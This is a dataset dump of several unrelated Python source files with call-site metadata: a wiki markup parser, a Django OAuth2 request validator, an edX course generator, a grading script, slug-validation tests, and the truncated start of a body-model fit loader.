return builder.tag.a(macro_body, href=arg_string)
else:
return builder.tag.a(arg_string, href=arg_string)
return None
##
## Create our custom dialect. It will use our class function and a TopicList
## instance. The root URL for all wiki topics will be the same as the
## 'aswiki_topic_index' url.
##
## NOTE: This assumes that the url for a specific Topic is the same as the url
## for the aswiki_topic_index with the Topic name appended to it
##
TOPIC_LIST = TopicList()
# dialect = creoleparser.dialects.Creole10(
# wiki_links_base_url = reverse('aswiki_topic_index'),
# wiki_links_space_char = '%20',
# use_additions = True,
# no_wiki_monospace = False,
# wiki_links_class_func = class_fn,
# wiki_links_path_func = TOPIC_LIST.path_fn,
# macro_func = macro_fn,
# interwiki_links_base_urls=dict(wikicreole='http://wikicreole.org/wiki/',
# wikipedia='http://wikipedia.org/wiki/',)
# )
parser = Parser(dialect = create_dialect(\
creole11_base,
wiki_links_base_url = reverse('aswiki_topic_index'), # NOTE: Make this
# a two element
# list for images
# to be loaded
# from a separate
# URL
wiki_links_space_char = '%20', # NOTE: make this a two element list to
# give images a different space
# character.
no_wiki_monospace = False,
wiki_links_class_func = class_fn,
wiki_links_path_func = (TOPIC_LIST.path_fn,
TOPIC_LIST.image_fn),
bodied_macros = { },
non_bodied_macros = { },
macro_func = macro_fn,
# custom_markup = (),
interwiki_links_base_urls = {
'wikicreole' : 'http://wikicreole.org/wiki/',
'wikipedia' :'http://wikipedia.org/wiki/' }
))
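####################################################################
#
# A rendering sketch (an assumption about intended usage, not part of the
# original module): lock and clear the shared TOPIC_LIST, render the raw
# markup, then copy out the referenced topics before unlocking.
#
def example_render(raw_markup, topic_name=None):
    TOPIC_LIST.clear_and_lock()
    try:
        TOPIC_LIST.current_topic = topic_name
        html = parser.render(raw_markup)
        referenced = list(TOPIC_LIST.topics)
        extra_refs = list(TOPIC_LIST.extra_references)
    finally:
        TOPIC_LIST.unlock()
    return typogrify(html), referenced, extra_refs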
| [((210, 11, 210, 51), 'aswiki.models.Topic.objects.css_class_name', 'Topic.objects.css_class_name', ({(210, 40, 210, 50): 'topic_name'}, {}), '(topic_name)', False, 'from aswiki.models import Topic\n'), ((227, 11, 227, 67), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((261, 9, 261, 25), 'genshi.builder.tag.ul', 'builder.tag.ul', ({}, {}), '()', False, 'from genshi import builder\n'), ((289, 9, 289, 25), 'genshi.builder.tag.ul', 'builder.tag.ul', ({}, {}), '()', False, 'from genshi import builder\n'), ((110, 20, 110, 36), 'dummy_threading.Lock', 'threading.Lock', ({}, {}), '()', True, 'import dummy_threading as threading\n'), ((154, 12, 154, 32), 'urlparse.urlparse', 'urlparse', ({(154, 21, 154, 31): 'image_name'}, {}), '(image_name)', False, 'from urlparse import urlparse\n'), ((317, 19, 317, 63), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((319, 19, 319, 51), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((363, 30, 363, 59), 'django.core.urlresolvers.reverse', 'reverse', ({(363, 38, 363, 58): '"""aswiki_topic_index"""'}, {}), "('aswiki_topic_index')", False, 'from django.core.urlresolvers import reverse\n'), ((324, 19, 324, 32), 'django.utils.translation.ugettext', '_', ({(324, 21, 324, 31): 'macro_body'}, {}), '(macro_body)', True, 'from django.utils.translation import ugettext as _\n'), ((326, 19, 326, 32), 'django.utils.translation.ugettext', '_', ({(326, 21, 326, 31): 'arg_string'}, {}), '(arg_string)', True, 'from django.utils.translation import ugettext as _\n'), ((334, 19, 334, 61), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n'), ((336, 19, 336, 61), 'genshi.builder.tag.a', 'builder.tag.a', (), '', False, 'from genshi import builder\n')] |
anobi/django-oauth-api | oauth_api/validators.py | 95bf9b500dab326553a5a8a17d5c6da1a34f6ac4 | import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
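        """
        Return the credentials portion of an HTTP Basic Authorization header, or None if the header is missing or malformed
        """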
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
        Ensure the client_id belongs to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
        Check that an Application exists with the given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
Ensure the username and password is valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
| [((29, 22, 29, 45), 'oauth_api.models.get_application_model', 'get_application_model', ({}, {}), '()', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((163, 20, 163, 80), 'oauth_api.models.AuthorizationCode.objects.get', 'AuthorizationCode.objects.get', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((188, 20, 188, 88), 'oauth_api.models.AuthorizationCode.objects.get', 'AuthorizationCode.objects.get', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((223, 23, 229, 9), 'oauth_api.models.AccessToken.objects.create', 'AccessToken.objects.create', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((365, 15, 365, 65), 'django.contrib.auth.authenticate', 'authenticate', (), '', False, 'from django.contrib.auth import authenticate\n'), ((67, 26, 67, 55), 'base64.b64decode', 'base64.b64decode', ({(67, 43, 67, 54): 'auth_string'}, {}), '(auth_string)', False, 'import base64\n'), ((176, 20, 176, 52), 'oauth_api.settings.oauth_api_settings.SCOPES.keys', 'oauth_api_settings.SCOPES.keys', ({}, {}), '()', False, 'from oauth_api.settings import oauth_api_settings\n'), ((195, 18, 195, 32), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((195, 35, 195, 96), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((218, 18, 218, 32), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((218, 35, 218, 96), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((236, 12, 242, 13), 'oauth_api.models.RefreshToken.objects.create', 'RefreshToken.objects.create', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((359, 40, 359, 72), 'oauth_api.settings.oauth_api_settings.SCOPES.keys', 'oauth_api_settings.SCOPES.keys', ({}, {}), '()', False, 'from oauth_api.settings import oauth_api_settings\n'), ((233, 26, 233, 40), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((233, 43, 233, 105), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((281, 27, 281, 84), 'oauth_api.models.AccessToken.objects.select_related', 'AccessToken.objects.select_related', ({(281, 62, 281, 75): '"""application"""', (281, 77, 281, 83): '"""user"""'}, {}), "('application', 'user')", False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((305, 24, 305, 72), 'oauth_api.models.AuthorizationCode.objects.select_related', 'AuthorizationCode.objects.select_related', ({(305, 65, 305, 71): '"""user"""'}, {}), "('user')", False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((332, 17, 332, 60), 'oauth_api.models.RefreshToken.objects.select_related', 'RefreshToken.objects.select_related', ({(332, 53, 332, 59): '"""user"""'}, {}), "('user')", False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n'), ((213, 16, 213, 69), 
'oauth_api.models.RefreshToken.objects.get', 'RefreshToken.objects.get', (), '', False, 'from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication\n')] |
padmacho/pythontutorial | objects/fun_return.py | 80c58d2d6efc0c3598f92b627338c6cd9fda1759 | def modify(y):
return y # returns same reference. No new object is created
x = [1, 2, 3]
y = modify(x)
print("x == y", x == y)
print("x == y", x is y) | [] |
hberndl70/mooc-generator | edx_gen/_write_comps.py | 58ff77ece12b456887ec24db79d8baa87ecd5621 | import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
meta_tag = h1_tags[0] # the first h1 the should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| [((27, 20, 27, 52), 'edx_gen._markdown.convertMd', '_markdown.convertMd', ({(27, 40, 27, 51): 'md_filepath'}, {}), '(md_filepath)', False, 'from edx_gen import _markdown\n'), ((87, 19, 88, 66), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(87, 50, 87, 61): 'md_filepath', (87, 63, 87, 71): 'meta_tag', (88, 12, 88, 37): '_edx_consts.COMP_HTML_REQ', (88, 39, 88, 64): '_edx_consts.COMP_HTML_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT)', False, 'from edx_gen import _read_metadata\n'), ((101, 15, 102, 78), 'edx_gen._write_comp_html.writeXmlForHtmlComp', '_write_comp_html.writeXmlForHtmlComp', ({(102, 12, 102, 23): 'md_filepath', (102, 25, 102, 38): 'comp_filename', (102, 40, 102, 52): 'tree_snippet', (102, 54, 102, 62): 'settings', (102, 64, 102, 77): 'unit_filename'}, {}), '(md_filepath, comp_filename,\n tree_snippet, settings, unit_filename)', False, 'from edx_gen import _write_comp_html\n'), ((108, 19, 109, 76), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(108, 50, 108, 61): 'md_filepath', (108, 63, 108, 71): 'meta_tag', (109, 12, 109, 42): '_edx_consts.COMP_PROB_QUIZ_REQ', (109, 44, 109, 74): '_edx_consts.COMP_PROB_QUIZ_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT)', False, 'from edx_gen import _read_metadata\n'), ((121, 15, 122, 78), 'edx_gen._write_comp_checkboxes.writeXmlForProbCheckboxesComp', '_write_comp_checkboxes.writeXmlForProbCheckboxesComp', ({(122, 12, 122, 23): 'md_filepath', (122, 25, 122, 38): 'comp_filename', (122, 40, 122, 52): 'tree_snippet', (122, 54, 122, 62): 'settings', (122, 64, 122, 77): 'unit_filename'}, {}), '(md_filepath,\n comp_filename, tree_snippet, settings, unit_filename)', False, 'from edx_gen import _write_comp_checkboxes\n'), ((129, 19, 130, 91), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(130, 12, 130, 23): 'md_filepath', (130, 25, 130, 33): 'meta_tag', (130, 35, 130, 61): '_edx_consts.COMP_VIDEO_REQ', (130, 63, 130, 89): '_edx_consts.COMP_VIDEO_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT)', False, 'from edx_gen import _read_metadata\n'), ((145, 15, 146, 64), 'edx_gen._write_comp_video.writeXmlForVidComp', '_write_comp_video.writeXmlForVidComp', ({(146, 12, 146, 23): 'md_filepath', (146, 25, 146, 38): 'comp_filename', (146, 40, 146, 48): 'settings', (146, 50, 146, 63): 'unit_filename'}, {}), '(md_filepath, comp_filename, settings,\n unit_filename)', False, 'from edx_gen import _write_comp_video\n'), ((153, 19, 154, 77), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', ({(153, 50, 153, 61): 'md_filepath', (153, 63, 153, 71): 'meta_tag', (154, 12, 154, 43): '_edx_consts.COMP_GOOGLE_DOC_REQ', (154, 45, 154, 76): '_edx_consts.COMP_GOOGLE_DOC_OPT'}, {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)', False, 'from edx_gen import _read_metadata\n'), ((163, 15, 163, 90), 'edx_gen._xml_google_doc.tagForGoogleDocComp', '_xml_google_doc.tagForGoogleDocComp', ({(163, 51, 163, 64): 'comp_filename', (163, 66, 163, 74): 'settings', (163, 76, 163, 89): 'unit_filename'}, {}), '(comp_filename, settings, unit_filename)', False, 'from edx_gen import _xml_google_doc\n')] |
ByeonghoonJeon/Student-Grading | grading_program.py | eee55638aee4390d7758c1204b85cce7279ccdf7 | # 1. Create students score dictionary.
students_score = {}
# 2. Input student's name and check if input is correct. (Alphabet, period, and blank only.)
# 2.1 Create a function that evaluates the validity of the name.
def check_name(name):
    # 2.1.1 Remove periods and blanks, then check whether the name consists only of alphabetic characters.
    # 2.1.1.1 Make a list of the characters in the name.
    list_of_spelling = list(name)
    # 2.1.1.2 Remove periods and blanks from the list.
while "." in list_of_spelling:
list_of_spelling.remove(".")
while " " in list_of_spelling:
list_of_spelling.remove(" ")
# 2.1.1.3 Convert the list to a string.
list_to_string = ""
list_to_string = list_to_string.join(list_of_spelling)
    # 2.1.1.4 Return whether the string is alphabetic.
return list_to_string.isalpha()
while True:
# 2.2 Input student's name.
name = input("Please input student's name. \n")
check_name(name)
    # 2.3 Check if the name is alphabetic. If not, ask for a correct name again.
while check_name(name) != True:
name = input("Please input student's name. (Alphabet and period only.)\n")
# 3. Input student's score and check if input is correct. (digits only and between zero and 100)
score = input(f"Please input {name}'s score.(0 ~ 100)\n")
while score.isdigit() == False or int(score) not in range(0, 101):
score = input("Please input valid numbers only.(Number from zero to 100.)\n")
students_score[name] = score
# 4. Ask another student's information.
another_student = input(
"Do you want to input another student's information as well? (Y/N)\n"
)
while another_student.lower() not in ("yes", "y", "n", "no"):
# 4.1 Check if the input is valid.
another_student = input("Please input Y/N only.\n")
if another_student.lower() in ("yes", "y"):
continue
elif another_student.lower() in ("no", "n"):
break
for student in students_score:
score = students_score[student]
score = int(score)
if score >= 90:
students_score[student] = "A"
elif score in range(70, 90):
students_score[student] = "B"
elif score in range(50, 70):
students_score[student] = "C"
elif score in range(40, 50):
students_score[student] = "D"
else:
students_score[student] = "F"
print(students_score)
| [] |
by46/recipe | test/test_utils.py | 203abd2141a536b66b4e57d073169a49395be1f0 | import unittest
from recipe import utils
class UtilTestCase(unittest.TestCase):
def test_valid_project_slug(self):
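        # Slugs made of letters, digits and underscores up to 50 characters are accepted;
        # empty, 51-character and punctuated slugs must be rejected.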
project_slug = "Recipe0123456789_mock"
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = 'Recipe00000000000000000000000000000000000000000000'
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = ""
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "Recipe000000000000000000000000000000000000000000001"
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "-!@#$%^&*()_+"
self.assertFalse(utils.valid_project_slug(project_slug))
| [((9, 24, 9, 62), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(9, 49, 9, 61): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((12, 24, 12, 62), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(12, 49, 12, 61): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((15, 25, 15, 63), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(15, 50, 15, 62): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((18, 25, 18, 63), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(18, 50, 18, 62): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n'), ((21, 25, 21, 63), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', ({(21, 50, 21, 62): 'project_slug'}, {}), '(project_slug)', False, 'from recipe import utils\n')] |
wangxihao/rgbd-kinect-pose | extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
            for j in range(0, pose_body_mats.shape[0]):
